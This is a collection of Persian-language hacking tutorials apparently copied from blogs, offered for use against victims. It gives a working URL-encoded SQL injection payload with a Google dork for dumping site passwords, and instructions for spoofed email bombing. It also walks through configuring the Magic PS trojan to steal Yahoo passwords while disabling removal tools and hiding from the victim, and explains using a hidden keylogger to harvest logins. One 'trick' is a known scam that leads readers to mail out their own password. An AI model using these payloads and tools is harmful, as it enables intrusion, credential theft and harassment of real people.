یكی دیگر از روشهای هك ایمیل بمب كردن اونه یعنی فرستادن ایمیل به یك
باره و به تعداد بسیار زیاد مثلا 100000 تا كه سبب خراب شدن میل بوكس طرف میشه و همچنین
وقت زیادی برای پاك كردنش لازم هست فایلهای زیادی برای این كار هست كه به نظر من
دلفی بومبر از همشون بهتره كه من لینكشو گذاشتم كه نتنها میتونید به وسیلش
ایمیل بمب كنید میتونید ایمیلهای معمولیتونم به وسیله اون بفرستید ودیگه نیازی
نیست كه برای فرستادن ایمیل وارد سایتهای مختلف بشید بعد از داون لود فایل قسمتهای مختلفی میبینید
كه من اونارو توضیح میدم در قسمت
SMTP SERVER
شما باید آدرس اس ام تی پی سایتی كه ایمیل گیرنده از اون هستو بنویسید
مثلا اگه میخواید ایمیل
shervin_kesafat@yahoo.com
رو بمب كنید باید اس ام تی پی یاهوو كه
mx4.mail.yahoo.com
هستو بنویسید و سایت نواور كه
mail.noavar.com
هست و مینویسید در قسمت
from(email id)
ایمیل فرستنده هستش كه میتونید هر ایمیلی كه وجود خارجی داره رو بنویسید و
به اسم دیگران ایمیل بزنید در قسمت
from(name)
اسم فرستنده هستش هر چی نوشتی نوشتی در قسمت
to(email id)
ایمیل قربانی و مینویسید و در قسمت
to(name)
اسم قربانی فرقی نمیكنه به قسمتهای
CC BCC
كاری نداشته باشید در قسمت
subject
عنوان نامه و در قسمت
no. ofbomb
تعداد نامه یا همون بمبهایی كه میخواید بفرستید رو مینویسید در
قسمت
body
متن نامه و شما میتونید در قسمت
attachments
هر فایلی كه میخواید از سیستمتون انتخاب و به نامه بچسبونید در پایان
send
و میزنید و منتظر می شید تا نامه ها فرستاده بشند مشكلی پیش اومد بگو
برای داونلود دلفی اینجا كلیك كنید
سلام دوستان!
امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!
این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای pfriendly.php هستند به هک آنها بپردازید!
خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:
pfriendly.php?ad=
حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2F
select%2F%2A%2A%2F0,1,concat(username,0x3a,email),password
,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
حال مشاهده خواهید کرد که یورز نیم و پسورد سایت را در اختیار شما قرار داده می شود!
مثال:
توجه:کلیه مطالب قرار گرفته شده در این آموزش به علت به روز رسانی سریع سایت ها در مقابل اکسپلویدها حد اکثر زمان قابل استفاده تا ۲۵ روز پس از تاریخ به روز رسانی این پست قابل استفاده می باشند!
منیع: www.c-o.c-o.in
توسط این مقاله شما میتوانید هک کردن آی دی یاهو رو بصورت کاملاساده یاد بگیردید. برای یادگیری احتیاج به هک ندارید چون فقط از یک نرم افزار قدرتمند و ساده و کم حجم برای اینکار استفاده میکنیم که با توضیحی در مورد کارهای گوناگونش دیگر جایی برای سوال نخواهد ماند.
با چه نرم افزاری باید آی دی یاهو هک کنیم؟
برای هک کردن آی دی یاهو شما به نرم افزار قدرتمندی به نام Magic PS احتیاج دارید که نسخه 1.5 آن که همه جا بصورت پولی میباشد در سافت وبلاگ بصورت رایگان دریافت کنید.بعد از دریافت فایل... نرم افزار را از پوشه زیپ بیرون بکشید و بروی دسکتاپ خود بیاندازید.
آشنایی با نرم افزار قدرتمند Magic PS
کار این نرم افزار به اینصورت میباشد که با دادن آی دی خودتان به نرم افزارو تعریف کردن یک سرور و اسال آن به قربانی پسورد و یا همان کلمه رمزآی دی آن شخص به همان آی دی ای که در نرم افزار بکار برده اید PM می آید.
اصلا سرور به چی میگویند؟
سرور به فایلی میگویند که توسط نرم افزار هک ساخته میشود و آن را نباید بروی سیستم خود اجرا کرد و فقط برای ارسال آن برای سیستم قربانی می باشد.
آشنایی با نرم افزار
همانطور که دقت میکنیداین نرم افزار از چند قسمت کوچک تشکیل شده است.قسمت Victim که از که باید سرور رو آماده اون کارها کنید و با تیک زدن آنحرف آن عمل را فعال میکنید
.Send Y!Mess Pass: این قسمت را حتما تیک بزنید چون کلمه رمز طرف رابرای شما ارسال میکند.Send IP: این قسمت بدرد هکرهایی میخورد که با تروجان کار میکنند ومیخواهند IP اون شخص را بدست بیاورند و با تیک زدن این قسمت IPشخص برای شما ارسال میشود.
Disable taskmgr xp-2k: با فعال کردن این قسمت شخص بعد از اجرای سرور وقتی Ctrl + Alt+Delete بفشارد پنجره ای باز نمیشود و در اصل پنجره Task Manager را غیر فعال میکند.
Disable Y! Save Pass: این تیک را حتما فعال کنید تا کلمه رمزش در یاهو ذخیره نشود و مجبور شود حتما کلمه رمز را دوباره تایپ کند تا برای شما ارسال شود یعنی باعث میشود که کلمه رمز در یاهو ذخیره نشود.
Delet Mess Archive: این هم یکی از قدرتهای استثنایی این نسخه کهدیگر نگران پیدا کردن آی دی خود از طرف قربانی نباشید زیرا با فعال کردناین گزینه تمامی بایگانی پیغام های قربانی حذف میشود.
Send OS Name: ارسال نام کامپیوتر قربانی
Auto Startup: شروع سرور بصورت خودکار
Disable RegEdit: غیر فعال کردن خاصیت RegEdit چون تنهایی راهی هست که میتوان این سرور را از سیستم پاک کردن پس حتما این قسمترا تیک بزنید تا RegEdit نتواند بکند.
Disable MsConfig: غیر فعال کردن خاصیت MsConfig که قربانی میتواند بااستفاده از این خاصیت از شروع مجدد سرور بعد از Restart جلوگیری کندولی اگر شما این خاصیت را هم تیک بزنید دیگر هیچ کاری نمیتواند بکند.
Melt After Install: این هم یکی از قدرتهای این نسخه از نرم افزار میباشدکه با فعال کردن این وقتی قربانی سرور را اجرا کند فایل سرور محو میشود و قربانی هیچ عصری از سرور دیگر نمیبیند.
FileName after install: تغییر نام سرور یا فایل بعد از نصب بروی سیستم که بصورت دلخواه یکی از آن اسم ها را انتخاب کنید.
Fake Error Message: این قسمت را اگر فعال کنید میتوانید برای سرور خود پیغام خطا بگذارید که اگر قربانی سرور را اجرا کرد آن پیغام را مشاهده کند.تذکر: اگر با قربانی لج هستید این خاصیت را فعال کنید و در قسمت
Message پیغام خود را بنویسید و در اگر خواستید پیغامی که نوشته اید را مشاهده نمایید دکمه Test را بفشارید. اگر میخواهید قربانی متوجه هک شدن خودش نشود این خاصیت را فعال نکنید.
Y! ID: در این قسمت باید آی دی خودتان را در آن کادر وارد کنید تا پسورد بعد از وارد شدن به آی دی تان به آن ارسال شود.نکته: در این قسمت فقط آی دی را وارد کنید و نباید بهمراه @yahoo.com باشد.
Choose Icon: در این قسمت میتوانید نوع آیکن سرور خود را انتخاب کنید.
مثلا JPG Icon که مخصوص عکس میباشد را انتخاب کنید.
Binder: در این قسمت میتوانید فایل به سرور بچسبانید تا وقتی قربانیفایل اجرا کرد آن فایل اجرا شود تا قربانی شک نکند. مثلا میتوانید دکمه ... را در کنار Extract to فشار دهید و یک فایل عکس با فرمت jpg سعی کنید انتخاب کنید و open را بزنید. حالا وقتی قربانی فایل سرور را
اجرا کند آن عکس برایش باز میشود و هیچ شکی به فایل که شما برایش ارسال کرده اید نمیکند.
MPS Creator: در این قسمت فایل خود را انتخاب کنید و دکمه Creat MPSرا بفشارید تا سروری با آن اسمی که انتخاب کرده اید به کنار آیکن نرم افزار Magic PS بی افتد.تذکر: اگر موقع فشار دادن کلید Creat MPS با پیغام خطا You must select a file for binder… مواجه شدید پیغام را ok کنید و در قسمت Binder دوباره فایل عکس مورد نظرتان را برای نرم افزار Open کنید و دوباره بروی کلید Creat MPS کلیک کنید تا سرور ایجاد شود.مهم: فایل سرور را به هیچ عنوان بروی کامپیوتر خود اجرا نکنید.حالا فقط کافیست تا شما آن فایل را برای کسی که میخواهید پسوردشرا بدست آورید ارسال کنید تا بعد از اتصال مجدد به آی دی برای شمابصورت PM ارسال شود.این مقاله فقط برای سطح بالا بردن معلومات میباشد و استفاده نادرستاز آن به عهده خود شخص میباشد.
امروز طریقه هک کردن پسورد ایمیل اشخاص بدون استفاده از برنامه ای صحبت می کنیم
لطفاً توجه کنید و در آخر نظر دهید.
اول از همه وارد ایمیل خودتون تو سایت یاهو بشید . بعد برید به قسمت compose تا یک ایمیل بفرستید . در قسمت to: این عبارت رو تایپ کنید :passfinder_robot2000@yahoo.com
اینid همونی است که شما وقتی پسوردتون رو گم میکنید براتون میفرستدش. حالا در قسمت Subject این رو تایپ کنید :
"forgot password"
در متن نامه هم با دقت عبارتهای زیر را تایپ کنید :
"اینجا آیدی خودتون رو بنویسید": MY NEW ID
"اینجا پسورد همین آیدی تون رو بنویسید":MY NEW PASS
"اینجا آی دی کسی رو که میخواهید هک کنید بنویسید" :MY OLD ID
MY OLD PASS : I`ve Forgot
Yahoo="password" action=*^sds^d mail to componit $%GGSR4 ~~24 {s*755P}passfinder_robot="Backtomail"&*$source=off>
اگه اطلاعاتی که وارد کردید درست باشه حداکثر تا ۲۴ ساعت دیگه پسورد اون طرف به ایمیل شما ارسال میشه
تا حالا حتما براتون پیش اومده که یه جایی رفته باشین که بخواین شماره تلفن اونجا رو داشته باشین اما روتون نشده که از صاحب اونا بپرسین!شما میتونین با این روش شماره تلفن هر جا رو به راحتی بدست بیارین!
برای دونستن شماره اونجا فقط کافی است که شما گوشی تلفن اونجا رو بردارین و شماره زیر رو بگیرید: ۰۰۹۸۱۰۶۱۲۳۴۵۶۷۸۹ بله با این شماره به تلفن گویای اینترنتی بین الملل ایران وصل میشین که به شما شماره تلفنی که شما با اون این شماره رو گرفتین رو میگه!
لازم به ذکراست که شما بعد از اتصال شماره باید(۳۰)ثانیه صبر کنین تا پاسخ مورد نظر را از اپراتور مربوطه دریافت نمائید و همچنین این سیستم در برخی از شهرها فعال نمی باشد و این تر فند بر روی تلفنهایی که این سیستم توسط مخابرات در اون شهر فعال نشده است عملی نمی باشد!اما بر روی حدود ۹۰٪ از مخابرات های شهرهای مختلف کشور فعال می باشد و به طور کامل قابل استفاده برای تمامی مشترکین این شهرها می باشد!
شما با این کار میتونین شماره باجه های تلفن را به راحتی به دست بیارین و بجای اینکه شماره خونه رو به دوست ........ بدین (ترس و ...........)میتونین شماره باجه مخابراتی به اون بدین که در یه زمان معین به شما زنگ بزنه حتی با داشتن کارت تلفن اینترنتی که بتونین با اون دو صفر(۰۰)بگیرین به راحتی میتونین با این روش شماره تلفن عمومی رو هم به دست بیارین !
با تشکر پسورد ۳۵
حفره ی امنیتی در مایکروسافت ویندوز Microsoft Windows کشف و گزارش شده است که می تواند برای دسترسی و نفوذ غیر مجاز به سیستم ها مورد استفاده قرار گیرد همچنین چنین آسیب پذیری هایی خطر بالقوه ای برای سیستمهای آسیب پذیر می باشند.
این آسیب پذیری از یک خطای حدی (Boundary Error) در Message Queuing Service (MSMQ) زمان پردازش پیام های MSMQ ناشی می شود.
این نقیصه امنیتی میتوانند باعث یک سرریز باف بوسیله ارسال بسته های دستکاری شده به MSMQ service شود.
در صورت نصب Message Queuing component بر روی سیستم (که بصورت پیش فرض فعال نمی باشد ) امکان حمله موفقیت و اجرا کد آمیز برای نفوذگر فراهم خواهد شد .
راه چاره :
دریافت بسته های تکمیلی Microsoft Windows 2000 Server SP4
http://www.microsoft.com/downloads/details.aspx?FamilyId=[..]
اطلاعات تكمیلی :
http://www.milw0rm.com/exploits/4745

دریافت نرم افزار
منبع:http://barcelonband.persianblog.ir/
این برنامه توسط هیچ نوع آنتی ویروسی حتی آنتی ویروس های قوی و به روز شده نیز قابل شناسایی نیست.
این برنامه نیاز به نصب ندارد و بعد از کلیک بر روی آن تا همیشه کار می کند.برای اطمینان بیشتر و برای اینکه کسی نفهمد که شا این برنامه را اجرا کرده اید، ابتدا برنامه را در یک جای مخفی کامپیوتر یا یه جای دنج کپی کنید و بعد اون را اجرا کنید.
این برنامه تمامی نتایج بدست اومده خودش رو فقط و فقط بر روی یکی از درایو ها ذخیره می کنه و هیچ فایل یا اطلاعات دیگر را به جایی نمی فرسته.{محل ذخیره کردن فایل این برنامه C:\Temp\Sammoddhr.ary است.که mo ماه و dd روز و hr ساعت اجرای برنامه است.sam یه اسمیه که خیلی تابلو نشه و .ary نیز مختصر اسم خودم است.}
این برنامه قابلیت تشخیص کلید های بزگ و کوچک و همچنین تشخیص کاراکتر های خاص مثل !@#$%^&*)( و فاصله را نیز دارد.
برای حذف این برنامه در ویندوز ایکس پی در منوی استارت به قسمت RUN بروید و در این قسمت کلمه MSConfig را بنویسید و به بعد از اینکه برنامه System Configuration Utility اجرا شد به قسمت Startup بروید و تیک برنامه های SysRun را بردارید.(اکثر برنامه هایی که در این قسمت هستند احتمال دارد که ویروس باشند.)
بعد از این که این برنامه را اجرا کردید برنامه به طور مخفی اجرا می شود و با هر بار اجرای ویندوز نیز اجرا می شود.
تشخیص کلید های فشرده شده :
این برنامه کلیدهای معمولی را به صورت عادی می نویسد.کلید های معمولی مثل ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_+~?><":}{|/.,';][\`
کلید های خاص را نیز به صورت {home} {Delete} یا به طور کلی {اسم کلید} می نویسد.
تشخیص سایت های بازدید شده :
این برنامه تمامی سایت هایی را که کاربر مشاهده کرده و تمامی برنامه هایی که اجرا کرده و تمامی کارهایی را که انجام داده مینویسد.طریقه نوشتن هم به این صورت است که {Win==>page Title} که Page Title همان عنوان صفحه است.مثلاً {Win==>Windows Task Manager} نشان می دهد که کاربر تسک منیجر ویندوز را اجرا کرده است.یا مثلا {Win==>Start Menu} نشنا می دهد که کاربر بر روی دکمه استارت کلیک کرده است.{Win==>Yahoo! Messenger - Invisible} نشان می دهد که کاربر به صورت مخفی می خواهد وارد یاهو شود است.{Win==>Sign In} نشان می دهد که کاربر وارد صفحه ورود سایت یا برنامه ای شده و می خواهد پسورد خود را پیدا کند.
طریقه بدست آوردن پسورد یاهو مسنجر با استفاده از این برنامه:
بدست آوردن پسورد یاهو مسنجر تنها یکی از صد ها کاربرد این برنامه است.برای بدست آوردن پسورد یاهو اول فایلی که توسط این برنامه ساخته شده را با برنامه نوتپد باز می کنیم.{برای باز کردن فایل به نشانی C:\Temp\Sammoddhr.ary بروید.که mo ماه و dd روز و hr ساعت اجرای برنامه است.sam یه اسمیه که خیلی تابلو نشه و .ary نیز مختصر اسم خودم است.}{برای اجرای برنامه نوتپد به منوی استارت بروید و در آنجا گزینه Run را اجرا کنید و در کادر روبرو کلمه Notepad را بنویسید.}
بعد از باز کردن فایل برنامه دنبال کلمه {Win==>Sign In} بگردید{برای جستجو در نوتپد به منوی Edit>Find بروید یا دکمه های CTRL+F را فشار بدهید.}این محلی است که کاربر یوزر نیم پسورد خود را می نویسد.معمولاً کلمه ای که بعد از {Win==>Sign In} می آید یوزرنیم است.و کاربر بعد از اینکه اسم خود را می نویسد دکمه {Tab} رافشار می دهد و سپس پسورد خود را می نویسد.بعد از اینکه یوزر نیم و پسورد نفر اول را پیدا کردید.باز هم این کار را انجام دهید تا یوزر نیم ها و پسورد های دیگر را نیز بدست آورید.
من خودم با همین برنامه یه روز 9 تا و روز بعد 12 تا یوزر نیم و پسورد پیدا کردم.البته روز بعد دیگه این برنامه را حذف کردم.
همونطور که گفتم این برنامه میتونه حرف هایی که داخل چت هم گفته میشه رو یادداشت کنه.برای این کار به دنبال یوزرنیم مورد نظر می گردیم و بعد از اون می تونیم حرف هاش رو ببینیم.
دریافت نرم افزار
منبع:www.irphc.com